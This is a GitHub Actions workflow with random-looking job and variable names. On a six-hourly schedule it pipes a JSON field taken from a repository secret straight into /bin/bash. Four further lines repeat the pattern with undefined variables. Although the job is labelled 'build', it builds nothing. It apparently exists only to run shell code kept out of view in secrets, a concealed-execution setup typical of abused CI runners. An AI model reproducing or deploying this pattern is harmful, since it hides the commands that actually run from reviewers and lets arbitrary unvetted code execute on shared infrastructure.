name: yutongshen7483
on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yutongshen7483
        env:
          olos96: ${{ secrets.olos96 }}
        run: |
          echo $olos96 | jq -r .puacj11473 | /bin/bash
          echo $ju87352 | jq -r .zc69238 | /bin/bash
          echo $ogchy41533 | jq -r .wyg52 | /bin/bash
          echo $t38 | jq -r .lsu898 | /bin/bash
          echo $sktde22598 | jq -r .tercz985 | /bin/bash

